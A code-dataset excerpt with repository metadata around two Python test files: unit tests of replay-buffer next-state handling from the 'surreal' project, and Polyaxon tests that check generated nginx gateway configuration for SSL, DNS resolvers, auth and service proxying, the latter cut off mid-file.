| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81a57fc5fa792d8f5fdaf2385dfdf602cdb2d94b
| 12,684
|
py
|
Python
|
surreal/tests/components/test_memories_generically.py
|
rosea-tf/surreal
|
8abfb18538340d50146c9c44f5ecb8a1e7d89ac3
|
[
"Apache-2.0"
] | 6
|
2019-12-17T17:56:26.000Z
|
2022-01-13T20:54:06.000Z
|
surreal/tests/components/test_memories_generically.py
|
rosea-tf/surreal
|
8abfb18538340d50146c9c44f5ecb8a1e7d89ac3
|
[
"Apache-2.0"
] | 4
|
2019-11-04T07:17:27.000Z
|
2019-11-04T07:19:25.000Z
|
surreal/tests/components/test_memories_generically.py
|
rosea-tf/surreal
|
8abfb18538340d50146c9c44f5ecb8a1e7d89ac3
|
[
"Apache-2.0"
] | 2
|
2019-11-29T15:38:54.000Z
|
2020-02-24T11:24:04.000Z
|
# Copyright 2019 ducandu GmbH. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import numpy as np
import unittest
from surreal.components.memories import PrioritizedReplayBuffer, ReplayBuffer
from surreal.spaces import Bool, Dict, Float, Int
from surreal.tests.test_util import check
from surreal.utils.errors import SurrealError
class TestMemoriesGenerically(unittest.TestCase):
    """
    Tests different generic functionalities of Memories.
    """
    # Full record space (not used by the next-state tests below, which rely on
    # `record_space_no_next_state` instead).
    record_space = Dict(
        states=dict(state1=float, state2=Float(shape=(2,))),
        actions=dict(action1=int),
        reward=float,
        terminals=bool,
        main_axes="B"
    )
    # Compact space without a next-state component; next-states are wired in
    # via the memory's `next_record_setup` argument in the tests below.
    record_space_no_next_state = Dict(s=dict(s1=float, s2=float), a=dict(a1=Int(10)), r=float, t=Bool(), main_axes="B")

    capacity = 10
    alpha = 1.0
    beta = 1.0
    max_priority = 1.0

    def test_next_state_handling(self):
        """
        Tests if next-states can be stored efficiently (not using any space!) in the memory.
        NOTE: The memory does not care about terminal signals, it will always return the n-next-in-memory state
        regardless of whether this is a useful state (terminal=False) or not (terminal=True). In case of a
        terminal=True, the next state (whether it be the true terminal state, the reset state, or any other random
        state) does not matter anyway.
        """
        capacity = 10
        batch_size = 2

        # Test all classes of memories.
        for class_ in [ReplayBuffer, PrioritizedReplayBuffer]:
            memory = class_(record_space=self.record_space_no_next_state, capacity=capacity,
                            next_record_setup=dict(s="s_"))

            # Insert n records (inserts must always be batch-size).
            data = dict(
                s=dict(s1=np.array([0.0, 1.0]), s2=np.array([2.0, 3.0])),
                a=np.array([0, 1]), r=np.array([-0.0, -1.0]), t=np.array([False, True]),
                s_=dict(s1=np.array([0.1, 1.1]), s2=np.array([2.1, 3.1]))
            )
            memory.add_records(data)

            # Check, whether inserting the wrong batch size raises Exception.
            try:
                data = self.record_space_no_next_state.sample(batch_size + 1)
                data["s_"] = self.record_space_no_next_state["s"].sample(batch_size)
                memory.add_records(data)
                assert False, "ERROR: Should not get here. Error is expected."
            except SurrealError:
                pass

            # Assert we can now fetch n elements.
            retrieved_data = memory.get_records(num_records=1)
            self.assertEqual(1, len(retrieved_data["t"]))

            # Check the next state (sampling returns one of the two inserted
            # records; branch on which one we got).
            if retrieved_data["s"]["s1"][0] == 0.0:
                self.assertTrue(retrieved_data["s_"]["s1"] == 0.1 and retrieved_data["s_"]["s2"] == 2.1)
            else:
                self.assertTrue(retrieved_data["s"]["s1"] == 1.0)
                self.assertTrue(retrieved_data["s_"]["s1"] == 1.1 and retrieved_data["s_"]["s2"] == 3.1)

            # Insert another 2xn records and then check for correct next-state returns when getting records.
            data = dict(
                s=dict(s1=np.array([0.1, 1.1]), s2=np.array([2.1, 3.1])),
                a=np.array([2, 3]), r=np.array([-2.0, -3.0]), t=np.array([False, False]),
                s_=dict(s1=np.array([0.2, 1.2]), s2=np.array([2.2, 3.2]))
            )
            memory.add_records(data)
            data = dict(
                s=dict(s1=np.array([0.2, 1.2]), s2=np.array([2.2, 3.2])),
                a=np.array([4, 5]), r=np.array([-4.0, -5.0]), t=np.array([True, True]),
                s_=dict(s1=np.array([0.3, 1.3]), s2=np.array([2.3, 3.3]))
            )
            memory.add_records(data)

            # Sample repeatedly to exercise random draws from the memory.
            for _ in range(20):
                retrieved_data = memory.get_records(num_records=2)
                self.assertEqual(2, len(retrieved_data["t"]))

                # Check the next states (always 0.1 larger than state).
                for i in range(2):
                    check(retrieved_data["s"]["s1"][i], retrieved_data["s_"]["s1"][i] - 0.1)
                    check(retrieved_data["s"]["s2"][i], retrieved_data["s_"]["s2"][i] - 0.1)
            self.assertTrue(memory.size == 6)

            # Insert up to capacity and check again.
            data = dict(
                s=dict(s1=np.array([0.3, 1.3]), s2=np.array([2.3, 3.3])),
                a=np.array([6, 7]), r=np.array([-6.0, -7.0]), t=np.array([True, False]),
                s_=dict(s1=np.array([0.4, 1.4]), s2=np.array([2.4, 3.4]))
            )
            memory.add_records(data)
            data = dict(
                s=dict(s1=np.array([0.4, 1.4]), s2=np.array([2.4, 3.4])),
                a=np.array([8, 9]), r=np.array([-8.0, -9.0]), t=np.array([False, False]),
                s_=dict(s1=np.array([0.5, 1.5]), s2=np.array([2.5, 3.5]))
            )
            memory.add_records(data)
            for _ in range(20):
                retrieved_data = memory.get_records(num_records=3)
                self.assertEqual(3, len(retrieved_data["t"]))

                # Check the next states (always 0.1 larger than state).
                for i in range(3):
                    check(retrieved_data["s"]["s1"][i], retrieved_data["s_"]["s1"][i] - 0.1)
                    check(retrieved_data["s"]["s2"][i], retrieved_data["s_"]["s2"][i] - 0.1)
            self.assertTrue(memory.size == 10)

            # Go a little bit (one batch) over capacity and check again.
            data = dict(
                s=dict(s1=np.array([0.5, 1.5]), s2=np.array([2.5, 3.5])),
                a=np.array([10, 11]), r=np.array([-10.0, -11.0]), t=np.array([True, True]),
                s_=dict(s1=np.array([0.6, 1.6]), s2=np.array([2.6, 3.6]))
            )
            memory.add_records(data)
            for _ in range(20):
                retrieved_data = memory.get_records(num_records=4)
                self.assertEqual(4, len(retrieved_data["t"]))

                # Check the next states (always 0.1 larger than state).
                for i in range(4):
                    check(retrieved_data["s"]["s1"][i], retrieved_data["s_"]["s1"][i] - 0.1)
                    check(retrieved_data["s"]["s2"][i], retrieved_data["s_"]["s2"][i] - 0.1)
            # Size stays at capacity after overflowing (ring-buffer behavior).
            self.assertTrue(memory.size == 10)

    def test_next_state_handling_with_n_step(self):
        """
        Tests if next-states can be stored efficiently (not using any space!) in the memory using an n-step memory.
        NOTE: The memory does not care about terminal signals, it will always return the n-next-in-memory state
        regardless of whether this is a useful state (terminal=False) or not (terminal=True). In case of a
        terminal=True, the next state (whether it be the true terminal state, the reset state, or any other random
        state) does not matter anyway.
        """
        capacity = 10
        batch_size = 2

        # Test all classes of memories.
        for class_ in [ReplayBuffer, PrioritizedReplayBuffer]:
            memory = class_(record_space=self.record_space_no_next_state, capacity=capacity,
                            next_record_setup=dict(s="s_", n_step=3))

            # Insert n records (inserts must always be batch-size).
            data = dict(
                s=dict(s1=np.array([0.0, 1.0]), s2=np.array([2.0, 3.0])),
                a=np.array([0, 1]), r=np.array([-0.0, -1.0]), t=np.array([False, True]),
                s_=dict(s1=np.array([0.3, 1.3]), s2=np.array([2.3, 3.3]))  # s' is now the n-step s'
            )
            memory.add_records(data)

            # Check, whether inserting the wrong batch size raises Exception.
            try:
                data = self.record_space_no_next_state.sample(batch_size + 1)
                data["s_"] = self.record_space_no_next_state["s"].sample(batch_size)
                memory.add_records(data)
                assert False, "ERROR: Should not get here. Error is expected."
            except SurrealError:
                pass

            # Assert we cannot pull samples yet. n-step is 3, so we need at least 3 elements in memory.
            try:
                memory.get_records(num_records=1)
                assert False, "ERROR: Should not get here. Error is expected."
            except SurrealError:
                pass

            # Insert another 2xn records and then check for correct next-state returns when getting records.
            data = dict(
                s=dict(s1=np.array([0.1, 1.1]), s2=np.array([2.1, 3.1])),
                a=np.array([2, 3]), r=np.array([-2.0, -3.0]), t=np.array([False, False]),
                s_=dict(s1=np.array([0.4, 1.4]), s2=np.array([2.4, 3.4]))  # s' is now the n-step s'
            )
            memory.add_records(data)
            data = dict(
                s=dict(s1=np.array([0.2, 1.2]), s2=np.array([2.2, 3.2])),
                a=np.array([4, 5]), r=np.array([-4.0, -5.0]), t=np.array([True, True]),
                s_=dict(s1=np.array([0.5, 1.5]), s2=np.array([2.5, 3.5]))  # s' is now the n-step s'
            )
            memory.add_records(data)
            for _ in range(20):
                retrieved_data = memory.get_records(num_records=2)
                self.assertEqual(2, len(retrieved_data["t"]))

                # Check the next states (n-step=3: always 0.3 larger than state).
                for i in range(2):
                    check(retrieved_data["s"]["s1"][i], retrieved_data["s_"]["s1"][i] - 0.3)
                    check(retrieved_data["s"]["s2"][i], retrieved_data["s_"]["s2"][i] - 0.3)
            self.assertTrue(memory.size == 6)

            # Insert up to capacity and check again.
            data = dict(
                s=dict(s1=np.array([0.3, 1.3]), s2=np.array([2.3, 3.3])),
                a=np.array([6, 7]), r=np.array([-6.0, -7.0]), t=np.array([True, False]),
                s_=dict(s1=np.array([0.6, 1.6]), s2=np.array([2.6, 3.6]))
            )
            memory.add_records(data)
            data = dict(
                s=dict(s1=np.array([0.4, 1.4]), s2=np.array([2.4, 3.4])),
                a=np.array([8, 9]), r=np.array([-8.0, -9.0]), t=np.array([False, False]),
                s_=dict(s1=np.array([0.7, 1.7]), s2=np.array([2.7, 3.7]))
            )
            memory.add_records(data)
            for _ in range(20):
                retrieved_data = memory.get_records(num_records=3)
                self.assertEqual(3, len(retrieved_data["t"]))

                # Check the next states (n-step=3: always 0.3 larger than state).
                for i in range(3):
                    check(retrieved_data["s"]["s1"][i], retrieved_data["s_"]["s1"][i] - 0.3)
                    check(retrieved_data["s"]["s2"][i], retrieved_data["s_"]["s2"][i] - 0.3)
            self.assertTrue(memory.size == 10)

            # Go a little bit (two batches) over capacity and check again.
            data = dict(
                s=dict(s1=np.array([0.5, 1.5]), s2=np.array([2.5, 3.5])),
                a=np.array([10, 11]), r=np.array([-10.0, -11.0]), t=np.array([True, True]),
                s_=dict(s1=np.array([0.8, 1.8]), s2=np.array([2.8, 3.8]))
            )
            memory.add_records(data)
            data = dict(
                s=dict(s1=np.array([0.6, 1.6]), s2=np.array([2.6, 3.6])),
                a=np.array([10, 11]), r=np.array([-10.0, -11.0]), t=np.array([False, False]),
                s_=dict(s1=np.array([0.9, 1.9]), s2=np.array([2.9, 3.9]))
            )
            memory.add_records(data)
            for _ in range(20):
                retrieved_data = memory.get_records(num_records=4)
                self.assertEqual(4, len(retrieved_data["t"]))

                # Check the next states (n-step=3: always 0.3 larger than state).
                for i in range(4):
                    check(retrieved_data["s"]["s1"][i], retrieved_data["s_"]["s1"][i] - 0.3)
                    check(retrieved_data["s"]["s2"][i], retrieved_data["s_"]["s2"][i] - 0.3)
            # Size stays at capacity after overflowing (ring-buffer behavior).
            self.assertTrue(memory.size == 10)
| 46.804428
| 119
| 0.534926
| 1,858
| 12,684
| 3.558665
| 0.121636
| 0.09634
| 0.036298
| 0.03539
| 0.823654
| 0.810345
| 0.800061
| 0.77556
| 0.77556
| 0.77193
| 0
| 0.057699
| 0.303138
| 12,684
| 270
| 120
| 46.977778
| 0.69035
| 0.22146
| 0
| 0.717514
| 0
| 0
| 0.02708
| 0
| 0
| 0
| 0
| 0
| 0.107345
| 1
| 0.011299
| false
| 0.016949
| 0.033898
| 0
| 0.084746
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81a78c12f025e178d8991c77aff7ce7cb5293841
| 56,774
|
py
|
Python
|
cli/tests/test_proxies/test_gateway/test_schemas.py
|
polyaxon/cli
|
3543c0220a8a7c06fc9573cd2a740f8ae4930641
|
[
"Apache-2.0"
] | null | null | null |
cli/tests/test_proxies/test_gateway/test_schemas.py
|
polyaxon/cli
|
3543c0220a8a7c06fc9573cd2a740f8ae4930641
|
[
"Apache-2.0"
] | 1
|
2022-01-24T11:26:47.000Z
|
2022-03-18T23:17:58.000Z
|
cli/tests/test_proxies/test_gateway/test_schemas.py
|
polyaxon/cli
|
3543c0220a8a7c06fc9573cd2a740f8ae4930641
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
#
# Copyright 2018-2022 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from polyaxon import settings
from polyaxon.proxies.schemas.gateway.api import get_api_location_config
from polyaxon.proxies.schemas.gateway.auth import (
get_auth_config,
get_auth_location_config,
)
from polyaxon.proxies.schemas.gateway.dns import get_dns_config, get_resolver
from polyaxon.proxies.schemas.gateway.redirect import get_redirect_config
from polyaxon.proxies.schemas.gateway.services import (
get_plugins_location_config,
get_services_location_config,
)
from polyaxon.proxies.schemas.gateway.ssl import get_ssl_config
from polyaxon.proxies.schemas.gateway.streams import get_streams_location_config
from polyaxon.utils.test_utils import BaseTestCase
@pytest.mark.proxies_mark
class TestGatewaySchemas(BaseTestCase):
    # Tests that the gateway nginx config generators emit the exact expected
    # snippets for SSL and HTTP->HTTPS redirect.
    # NOTE(review): the expected raw strings must match generator output
    # byte-for-byte; their internal indentation may have been lost in this
    # copy -- verify against the actual get_ssl_config()/get_redirect_config()
    # output before relying on this transcription.
    SET_PROXIES_SETTINGS = True

    def test_ssl(self):
        # Default ssl_path: certificates under /etc/ssl/polyaxon.
        expected = r"""
# SSL
ssl_session_timeout 1d;
ssl_session_cache shared:SSL:50m;
ssl_session_tickets off;
# intermediate configuration
ssl_protocols TLSv1.2 TLSv1.3;
ssl_ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384;
ssl_prefer_server_ciphers on;
# OCSP Stapling
ssl_stapling on;
ssl_stapling_verify on;
resolver 1.1.1.1 1.0.0.1 [2606:4700:4700::1111] [2606:4700:4700::1001] 8.8.8.8 8.8.4.4 [2001:4860:4860::8888] [2001:4860:4860::8844] 208.67.222.222 208.67.220.220 [2620:119:35::35] [2620:119:53::53] valid=60s;
resolver_timeout 2s;
ssl_certificate /etc/ssl/polyaxon/polyaxon.com.crt;
ssl_certificate_key /etc/ssl/polyaxon/polyaxon.com.key;
"""  # noqa
        assert get_ssl_config() == expected
        # Overriding ssl_path must be reflected in the certificate paths.
        expected = r"""
# SSL
ssl_session_timeout 1d;
ssl_session_cache shared:SSL:50m;
ssl_session_tickets off;
# intermediate configuration
ssl_protocols TLSv1.2 TLSv1.3;
ssl_ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384;
ssl_prefer_server_ciphers on;
# OCSP Stapling
ssl_stapling on;
ssl_stapling_verify on;
resolver 1.1.1.1 1.0.0.1 [2606:4700:4700::1111] [2606:4700:4700::1001] 8.8.8.8 8.8.4.4 [2001:4860:4860::8888] [2001:4860:4860::8844] 208.67.222.222 208.67.220.220 [2620:119:35::35] [2620:119:53::53] valid=60s;
resolver_timeout 2s;
ssl_certificate /foo/polyaxon.com.crt;
ssl_certificate_key /foo/polyaxon.com.key;
"""  # noqa
        settings.PROXIES_CONFIG.ssl_path = "/foo"
        assert get_ssl_config() == expected

    def test_redirect_config(self):
        expected = r"""
server {
listen 80;
return 301 https://$host$request_uri;
}
"""  # noqa
        # Redirect block is emitted only when SSL is enabled.
        settings.PROXIES_CONFIG.ssl_enabled = False
        assert get_redirect_config() == ""
        settings.PROXIES_CONFIG.ssl_enabled = True
        assert get_redirect_config() == expected
@pytest.mark.proxies_mark
class TestGatewayServicesSchemas(BaseTestCase):
    # Tests the /services/... nginx location generator under different DNS
    # resolver / auth settings.
    # NOTE(review): expected raw strings must equal generator output exactly;
    # internal indentation may have been lost in this copy -- verify against
    # get_services_location_config() output.
    SET_PROXIES_SETTINGS = True

    def test_service_dns_resolver(self):
        settings.PROXIES_CONFIG.auth_enabled = False
        # No resolver directive and no auth_request lines when both the
        # resolver and auth are disabled.
        expected = r"""
location ~ /services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
proxy_pass http://plx-operation-$4.$1.svc.cluster.local;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
"""  # noqa
        settings.PROXIES_CONFIG.dns_use_resolver = False
        resolver = get_resolver()
        assert (
            get_services_location_config(resolver=resolver, auth="", rewrite=False)
            == expected
        )
        # With auth + custom resolver enabled, auth_request and resolver
        # directives appear and the cluster suffix changes.
        expected = r"""
location ~ /services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
auth_request /auth/v1/;
auth_request_set $auth_status $upstream_status;
resolver kube-dns.kube-system.svc.new-dns valid=5s;
proxy_pass http://plx-operation-$4.$1.svc.new-dns;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
"""  # noqa
        settings.PROXIES_CONFIG.auth_enabled = True
        settings.PROXIES_CONFIG.dns_prefix = "kube-dns.kube-system"
        settings.PROXIES_CONFIG.dns_use_resolver = True
        settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
        resolver = get_resolver()
        assert (
            get_services_location_config(
                resolver=resolver, auth=get_auth_config(), rewrite=False
            )
            == expected
        )

    def test_services_dns_backend(self):
        settings.PROXIES_CONFIG.auth_enabled = False
        settings.PROXIES_CONFIG.dns_use_resolver = True
        expected = r"""
location ~ /services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
resolver kube-dns.kube-system.svc.cluster.local valid=5s;
proxy_pass http://plx-operation-$4.$1.svc.cluster.local;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
"""  # noqa
        # Default cluster suffix.
        settings.PROXIES_CONFIG.dns_custom_cluster = "cluster.local"
        assert get_dns_config() == "kube-dns.kube-system.svc.cluster.local"
        resolver = get_resolver()
        assert (
            get_services_location_config(resolver=resolver, auth="", rewrite=False)
            == expected
        )
        expected = r"""
location ~ /services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
auth_request /auth/v1/;
auth_request_set $auth_status $upstream_status;
resolver kube-dns.kube-system.svc.new-dns valid=5s;
proxy_pass http://plx-operation-$4.$1.svc.new-dns;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
"""  # noqa
        # Custom cluster suffix with auth turned on.
        settings.PROXIES_CONFIG.auth_enabled = True
        settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
        assert get_dns_config() == "kube-dns.kube-system.svc.new-dns"
        resolver = get_resolver()
        assert (
            get_services_location_config(
                resolver=resolver, auth=get_auth_config(), rewrite=False
            )
            == expected
        )

    def test_services_dns_prefix(self):
        settings.PROXIES_CONFIG.auth_enabled = True
        settings.PROXIES_CONFIG.dns_use_resolver = True
        expected = r"""
location ~ /services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
auth_request /auth/v1/;
auth_request_set $auth_status $upstream_status;
resolver coredns.kube-system.svc.cluster.local valid=5s;
proxy_pass http://plx-operation-$4.$1.svc.cluster.local;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
"""  # noqa
        # Custom dns_prefix is reflected in the resolver line.
        settings.PROXIES_CONFIG.dns_prefix = "coredns.kube-system"
        settings.PROXIES_CONFIG.dns_custom_cluster = "cluster.local"
        assert get_dns_config() == "coredns.kube-system.svc.cluster.local"
        resolver = get_resolver()
        assert (
            get_services_location_config(
                resolver=resolver, auth=get_auth_config(), rewrite=False
            )
            == expected
        )
        expected = r"""
location ~ /services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
auth_request /auth/v1/;
auth_request_set $auth_status $upstream_status;
resolver kube-dns.new-system.svc.new-dns valid=5s;
proxy_pass http://plx-operation-$4.$1.svc.new-dns;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
"""  # noqa
        # Both a custom prefix and a custom cluster suffix.
        settings.PROXIES_CONFIG.dns_prefix = "kube-dns.new-system"
        settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
        assert get_dns_config() == "kube-dns.new-system.svc.new-dns"
        resolver = get_resolver()
        assert (
            get_services_location_config(
                resolver=resolver, auth=get_auth_config(), rewrite=False
            )
            == expected
        )
@pytest.mark.proxies_mark
class TestGatewayRewriteServicesSchemas(BaseTestCase):
SET_PROXIES_SETTINGS = True
    def test_service_dns_resolver(self):
        # Same as the non-rewrite variant, but with rewrite=True the location
        # uses the /rewrite-services/ prefix and adds rewrite directives.
        # NOTE(review): expected strings must equal generator output exactly;
        # internal indentation may have been lost in this copy.
        settings.PROXIES_CONFIG.auth_enabled = False
        expected = r"""
location ~ /rewrite-services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
rewrite_log on;
rewrite ^/rewrite-services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) /$5 break;
proxy_pass http://plx-operation-$4.$1.svc.cluster.local;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
"""  # noqa
        settings.PROXIES_CONFIG.dns_use_resolver = False
        resolver = get_resolver()
        assert (
            get_services_location_config(resolver=resolver, auth="", rewrite=True)
            == expected
        )
        expected = r"""
location ~ /rewrite-services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
auth_request /auth/v1/;
auth_request_set $auth_status $upstream_status;
resolver kube-dns.kube-system.svc.new-dns valid=5s;
rewrite_log on;
rewrite ^/rewrite-services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) /$5 break;
proxy_pass http://plx-operation-$4.$1.svc.new-dns;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
"""  # noqa
        # Auth + custom resolver enabled.
        settings.PROXIES_CONFIG.auth_enabled = True
        settings.PROXIES_CONFIG.dns_prefix = "kube-dns.kube-system"
        settings.PROXIES_CONFIG.dns_use_resolver = True
        settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
        resolver = get_resolver()
        assert (
            get_services_location_config(
                resolver=resolver, auth=get_auth_config(), rewrite=True
            )
            == expected
        )
    def test_services_dns_backend(self):
        # Rewrite-location variant of the DNS backend test: resolver line uses
        # the configured cluster suffix; auth directives appear only when
        # auth_enabled is set.
        # NOTE(review): expected strings must equal generator output exactly;
        # internal indentation may have been lost in this copy.
        settings.PROXIES_CONFIG.auth_enabled = False
        settings.PROXIES_CONFIG.dns_use_resolver = True
        expected = r"""
location ~ /rewrite-services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
resolver kube-dns.kube-system.svc.cluster.local valid=5s;
rewrite_log on;
rewrite ^/rewrite-services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) /$5 break;
proxy_pass http://plx-operation-$4.$1.svc.cluster.local;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
"""  # noqa
        settings.PROXIES_CONFIG.dns_custom_cluster = "cluster.local"
        assert get_dns_config() == "kube-dns.kube-system.svc.cluster.local"
        resolver = get_resolver()
        assert (
            get_services_location_config(resolver=resolver, auth="", rewrite=True)
            == expected
        )
        expected = r"""
location ~ /rewrite-services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
auth_request /auth/v1/;
auth_request_set $auth_status $upstream_status;
resolver kube-dns.kube-system.svc.new-dns valid=5s;
rewrite_log on;
rewrite ^/rewrite-services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) /$5 break;
proxy_pass http://plx-operation-$4.$1.svc.new-dns;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_hide_header X-Frame-Options;
proxy_set_header Origin "";
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_buffering off;
}
"""  # noqa
        # Custom cluster suffix with auth turned on.
        settings.PROXIES_CONFIG.auth_enabled = True
        settings.PROXIES_CONFIG.dns_custom_cluster = "new-dns"
        assert get_dns_config() == "kube-dns.kube-system.svc.new-dns"
        resolver = get_resolver()
        assert (
            get_services_location_config(
                resolver=resolver, auth=get_auth_config(), rewrite=True
            )
            == expected
        )
    def test_services_dns_prefix(self):
        """Rewrite-services location honors a custom dns_prefix in the resolver address.

        Checks a coredns prefix with the default cluster suffix, then a fully
        custom prefix + cluster suffix combination.
        """
        settings.PROXIES_CONFIG.auth_enabled = True
        settings.PROXIES_CONFIG.dns_use_resolver = True
        expected = r"""
location ~ /rewrite-services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
    auth_request /auth/v1/;
    auth_request_set $auth_status $upstream_status;
    resolver coredns.kube-system.svc.cluster.local valid=5s;
    rewrite_log on;
    rewrite ^/rewrite-services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) /$5 break;
    proxy_pass http://plx-operation-$4.$1.svc.cluster.local;
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_hide_header X-Frame-Options;
    proxy_set_header Origin "";
    proxy_set_header Host $http_host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_buffering off;
}
""" # noqa
        # coredns prefix with the default cluster suffix.
        settings.PROXIES_CONFIG.dns_prefix = "coredns.kube-system"
        settings.PROXIES_CONFIG.dns_custom_cluster = "cluster.local"
        assert get_dns_config() == "coredns.kube-system.svc.cluster.local"
        resolver = get_resolver()
        assert (
            get_services_location_config(
                resolver=resolver, auth=get_auth_config(), rewrite=True
            )
            == expected
        )
        expected = r"""
location ~ /rewrite-services/v1/([-_.:\w]+)/([-_.:\w]+)/([-_.:\w]+)/runs/([-_.:\w]+)/(.*) {
    auth_request /auth/v1/;
    auth_request_set $auth_status $upstream_status;
    resolver kube-dns.new-system.svc.new-dns valid=5s;
    rewrite_log on;
